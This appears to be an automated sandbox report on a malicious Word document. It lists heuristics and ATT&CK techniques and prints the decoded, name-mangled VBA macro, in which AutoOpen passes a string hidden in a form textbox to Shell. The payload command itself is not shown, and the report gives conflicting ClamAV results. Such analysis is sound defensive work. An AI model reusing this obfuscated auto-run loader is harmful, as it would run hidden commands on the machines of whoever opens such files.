Verdict: MALICIOUS
Risk Score: 252
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and triggers the execution of other VBA code. Heuristics indicate a 'Shell()' call within the VBA, which is used to invoke 'cmd.exe' with execution flags. This strongly suggests the macro's purpose is to download and execute a secondary payload.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6781698-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6781698-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `_ .Shell(mGuBHHIMHPA, sclQSQ), aGzJrF) Set KMBkNdftTjGiVRcKiaL = NhIkECmIBJutZwmHUlZj`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() kbqOifZPH`
- Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD): Suspicious cmd.exe invocation with execution flag.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6652 bytes |

SHA-256: 80c3888be74bcaaf428adfc26d5761becce2a714f7cca412af7dac7d8021b763
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 176 of 213 identifiers look randomly generated (e.g. 'wQENjNhzmSWjXvwSzfNzwXvv'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "FhvdaZPnwbHE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
kbqOifZPH
End Sub
Attribute VB_Name = "hzcfaiYr"
Function kbqOifZPH()
On Error Resume Next
Set pTrYEGvDzcaWcETXKV = ojMVEUttPLwarLBuQD
bTiLVQaQTJCOQPoinczmELNf = Sqr(ABjKaJCTOtAFYqEiDakNzhK)
jORSRrQFDTUPqF = 296390884 * Oct(zuCWnYOltHBlcRuTqfiLrkCW) * 188894131 * CEVoozhlOCfoQHAjZJqfclZ - (10157324 + CLng(LbhHPsftsWKQETDErDs) * 263123274 * CBool(13649657))
WLLKtjzSRfUPcVzdw = ChrW(zuYlpQUpmblhhNXw)
Set zKSafKXnKtFLbKEqzKGzhc = udifOvXFJcfiolvrSbl
LPoXDrObiQiHUiX = Sqr(ziIrmovivcQEDTnXvXQioKcX)
vWtuYOGNwtoStSXUGbab = 65053513 * Oct(PcKLwRtJmBlKrRCnXOJ) * 286834464 * ZzEBEtKhjBvXXGQ - (235455214 + CLng(RoUoHmhibFRSEMRS) * 125912775 * CBool(278227557))
GKrYicDApnTKmELzVXQR = ChrW(XSdosOipdEEQmdCZ)
Set sISjSzUadinLpwZcavUz = LkWnhhwZqQlXBJKwviPO
GFPdzwchBdBrzjYvtkRYA = Sqr(OCoopOfiQEivEfGKikUsom)
jDcmACuwqkTqNpLGNBWMz = 61931760 * Oct(bsoiBhEHwbSHkN) * 187944173 * cWGrKkosVXdGrSamWBAt - (80398616 + CLng(sRmdVPvhatlWuprSrr) * 26170550 * CBool(313674992))
iDzQfAfliMiSIipE = ChrW(OYzowkVUXkvEJJpQHNNp)
Set hJCrVtLLjvwjafLszjo = qqJwMqDTspcNmliZNCdjz
ZpHjAALduhLBjrAF = Sqr(fqrTqTktoBmfzCHmdQTp)
pDHOvvBlCmZHXzqGuiWW = 251687211 * Oct(wZwwiEOFajPzqmjE) * 308318760 * iImONXaFQjjizSuiFiP - (335939148 + CLng(zWwLssYHEWpozodZj) * 82096591 * CBool(179239138))
YohWsjwFMhBpvHllpD = ChrW(fCwLKuuziQEVVocsJp)
Const sclQSQ = 0
Set wjKSjfuMQiwjOSdJBlvawqD = SiiQKfVrqqaWikRljD
qLzilYJOAdSsHd = Sqr(zEAiClMHqYsHaRTJuvnNJS)
trAQVNXwStskNk = 10921988 * Oct(RiDIGsRiwjTXwT) * 107754231 * hDHmBUruTZZOihGYtuWi - (38772791 + CLng(uAaSUotzBwcMCJdO) * 340734939 * CBool(324144867))
JojTCAPauiBzhaXJGMiACA = ChrW(XalVfzviuYvwVOhXSF)
Set HnVlwUscJJdEwOBBvGVkTa = kibYdwaqBpjhcaDDfiwhZWsZ
caPjfVWjrkGXvPfi = Sqr(bPPhYbsDqFWsXNlCL)
WKJWTNAlpwjjPQ = 337385848 * Oct(vdKjDwXdoQzoUXU) * 137148801 * OJXIEvCjnlvWGqFtQSIsf - (325424273 + CLng(mjhDNMRScLzAHbwqhH) * 338544681 * CBool(106857302))
cGiZuuDFLcERmkcW = ChrW(pUWTSLGpwRRbbkjhKKZzdSR)
Set SPfTCqWzaWwLaYw = zPhWWlnFjKcJMUZBdt
INDllMiPBDhpvzEw = Sqr(EQkhcZjrNMlGzvhh)
pHwdwJoWmCBVjKHX = 86369178 * Oct(MIijoTuXAwJDHAIjKwAiHGvK) * 278279015 * hWhCdikzUYhITdjZJs - (81089662 + CLng(uBMzAKXipGMTpRlYqzSbT) * 66818023 * CBool(204816808))
BBdXziwDwHcjJjBTKFHOL = ChrW(SBrKiLZkOkWcwzhAi)
mGuBHHIMHPA = FhvdaZPnwbHE.TextBox1 + UioFP + zROCQYni + ozkiNtr + mCmKbAE + kMmvbPaT + FEJRFUq
Set nmrwJUIKnjPpmjEE = JiAKmIZESUvvCADAuPqrMif
IzhUrkzWbTlGwzB = Sqr(StrANPkfLorTNMhiDrBm)
ENiWYTjOzEuOMZTnivt = 99083907 * Oct(JCsdJPlHCEzOCN) * 210453714 * iowBQNkzFAnOrYv - (55288819 + CLng(YvKptPDzHuzzzJMniAH) * 322610533 * CBool(90862225))
vSvYIcXQiIpqdRVTlZsDIT = ChrW(zFqbaMYoLJmAruUGbarQr)
Set zjEaMvnrGqJjRCHjzHA = CfPwrhjcKtOQqOnKazZBczHR
jvKYNlITrYRTFjfP = Sqr(hNcspCOzGzhzWDYw)
KlVDwHGzwqVqVOulQRtpUq = 295961849 * Oct(bHmaTUUtVTYtuHkFWurMsHkk) * 262901249 * FmiJRTsYcpVfdiVc - (139076850 + CLng(pArJjoSZzjDTWB) * 250957287 * CBool(36594428))
iPMBFBViukqRMqQmj = ChrW(nWwFqqsTMUITTtYPnMIAkwWi)
Set JCRuZscQUXVzDTSE = zkDRzAtBiNBjKjMlwafLnW
EmBRrtTVGscCwYuMCXtrfb = Sqr(KoJNHsntzazzfvjBHPrur)
jQNCOcnufHcFrcijMdTzd = 189561259 * Oct(YPQTWlbnjqcHszEiKFFupWaE) * 40170831 * bDObrEDRonzJRIEUwO - (97128257 + CLng(pjHwJuXiJBoMNDJXYE) * 333746299 * CBool(158425575))
bLRhAnwpVaLpld = ChrW(wQSzjVImwlwOzhwrQqQOVpRI)
Set vZsvMQTirkQXUlESj = jfoaUnGwkaRhGjhqhURnhiAc
ojuEjfnJzfRaVEFpOjtQJijq = Sqr(EkAtOziLcfGLuBudYJEP)
MPMzSCGLoKADZivnQ = 227182954 * Oct(mPtZwiUfwnlVcbOrUovwu) * 158569633 * nVGHUWzqIaWcATqOTzWIYCpX - (187524901 + CLng(nbzUlnOPFDrWAJwz) * 192982882 * CBool(307135573))
wOYdaczXPbkjiiJ = ChrW(YrnoiNkNmWwzNJaZuRdzO)
Set EFniUkousTDHVLkF = nJmsqfFAotEDWjSbrbwXXfa
WIsRSzkQOWJjcUNaiijrkqWm = Sqr(jijoiUHjpWhmnhrInpAXj)
WOVopzjMfmFhmTBbjBBAnwjn = 307967233 * Oct(piwBVPBhHVStfH) * 338883822 * quhGvYHLJwWjLYiiupKA - (107139083 + CLng(RqfELfJnWtAKHlFoEQbk) * 289790567 * CBool(150924615))
SWjnkzqzwMMdqbrMbCWcciB = ChrW(zcFktZfmuzMhcsZnf)
Set WicocomwPnhMZpEW = UnCwNWhisUaOdpw
rWNTWDUOKrSSwzTufiGq = Sqr(OIHvGkULkmwiiiTqCkQTn)
WEOltAfjvjIscNFYPTzDZE = 135802795 * Oct(ORADczqWzcmDjVqUfBqOa) * 274595408 * GliUwTkMRjfXbzc - (46320135 + CLng(slvzbCsucfXYOFJYLuSzctCM) * 109588754 * CBool(133030813))
BwPUDutVotGfimaToN = ChrW(DdVwQEJJUzjjiGirwNLTdU)
tobdWca = Array(bImBrj, YTvDZz, ZivwU, Interaction _
_
_
_
_
_
_
_
.Shell(mGuBHHIMHPA, sclQSQ), aGzJrF)
Set KMBkNdftTjGiVRcKiaL = NhIkECmIBJutZwmHUlZj
jLDvEJhAmJoOGNdDQjKq = Sqr(rKpNEZiVptAbzhWFpz)
EIPAGiTiJDDEPsIoBNizjDi = 320991095 * Oct(nnGfHwbjRmNcJiilq) * 138779652 * lolirtUrGzJBiSjSr - (83543673 + CLng(CEbXwGuLrfAOti) * 79089670 * CBool(72087622))
BEOmmHVhHljKaPrYnSN = ChrW(QnbwhdMGlQTSHHRm)
Set UZBmTiANtdjowjnDPwfHRhXz = AFThcFWWumuScOMHuMqkwVrQ
aOKKjnBCoSYjjQXMS = Sqr(zslmjTAWUhOCfO)
RCrMLOztPnwnaO = 314398156 * Oct(XdRtXfnfqKJSUomnK) * 196602999 * OjAGqzwVznjaIYOqY - (92260754 + CLng(flPMVBEjZbBIcwzhlX) * 149767096 * CBool(177232154))
ZJnrKjAtFzNZqwcwUiFlQZuz = ChrW(DiJrdSBnXGccUKREmUdn)
Set jswbwSFVNRZdICuz = RoYEvQFboaloktPbUtMR
wzbQuuAGpqMNFpQnIoctA = Sqr(sThcXJCnIhhzToz)
BVEUzkZbiEznLFkYiqHHjR = 149505229 * Oct(EBhifIWbpUnGpfIHuGwTKOb) * 21190124 * JPcjpEjwNQzCuvWiXwqRdiDi - (340332278 + CLng(cTCjpZihWstuAQDH) * 183202912 * CBool(94070852))
FzLblmQklTaLthbb = ChrW(vjbXXNZdoczaOWHpX)
Set MwwwLDUGvCJfMICrvADu = wQENjNhzmSWjXvwSzfNzwXvv
JtOMivCriOjsibqmIJkmwpND = Sqr(vVpwBaUJSZTTlHWUpoj)
ZQDXKnNLJzUjLniaM = 306176728 * Oct(nLiQCWTXBORIAjkwfRSl) * 93639149 * JAVEmHwZwHvIsGrA - (9113978 + CLng(rQMwroUAaoDIuI) * 121075533 * CBool(177056178))
ivzjLZbSKNroiH = ChrW(QRuwAMJjkmhJWnNmpREI)
Set dkdEKbrFSmqMcwlfcF = aviXnVvRiiPCYVrK
fXwKPtvMqWIQQFAamLXvN = Sqr(iPJJbDjSrlmCzFGDLCnKwz)
BRYObmJTPVpojAFSrdYfXd = 95547178 * Oct(vUjzVHDsjdIsDpH) * 213607146 * RWjKQXCFjvjYUOXCRTHCJ - (331237234 + CLng(RwFFsNPCVszGGhw) * 205452310 * CBool(325127321))
umLWUOOkplWAdXSPONKR = ChrW(sTtLjXIQUVnKWPMv)
End Function